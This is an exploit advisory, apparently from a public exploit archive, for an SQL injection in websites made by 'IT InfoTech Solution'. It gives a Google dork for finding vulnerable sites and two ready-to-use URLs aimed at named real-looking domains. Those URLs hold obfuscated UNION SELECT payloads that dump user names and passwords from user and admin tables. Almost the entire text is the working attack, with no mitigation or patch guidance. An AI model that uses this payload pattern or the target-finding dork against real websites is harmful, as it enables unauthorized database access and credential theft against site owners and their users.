#Exploit Title: IT InfoTech Solution – SQL Injection vulnerability
#Date: 2020-07-07
#Exploit Author: Behrouz Mansoori
#Vendor Homepage: https://itinfotechsolution.com
#Google Dork: "Designed by IT InfoTech Solution"
#Category:webapps
#Tested On: windows 10, Firefox
Proof of Concept:
Search google Dork: "Designed by IT InfoTech Solution"
Demo 1: http://www.gkecindia.com/index.php?page=inner&tns_id=-11%27+/*!50000union*/+/*!50000select*/+1,2,/*!50000grouP_coNcat(user_name,0x3a,user_password)*/,4,5,6,7+/*!50000from*/+tbl_user--+&t=Our%20Team&title=Our%20Team
Demo 2: http://visadestiny.com/index.php?page=inner&tns_id=-48%27%20/*!12345union*/%20/*!12345select*/%201,2,3,4,/*!12345grouP_cOncat(user_name,0x3a,user_password,%27%3CBR%3E%27)*/,6,7,8,9,10,11%20/*!12345from*/%20tbl_admin_user--+&t=Tourist%20Visa&title=Tourist%20Visa
*********************************************************
#Discovered by: Behrouz mansoori
#instagram: Behrouz_mansoori
*********************************************************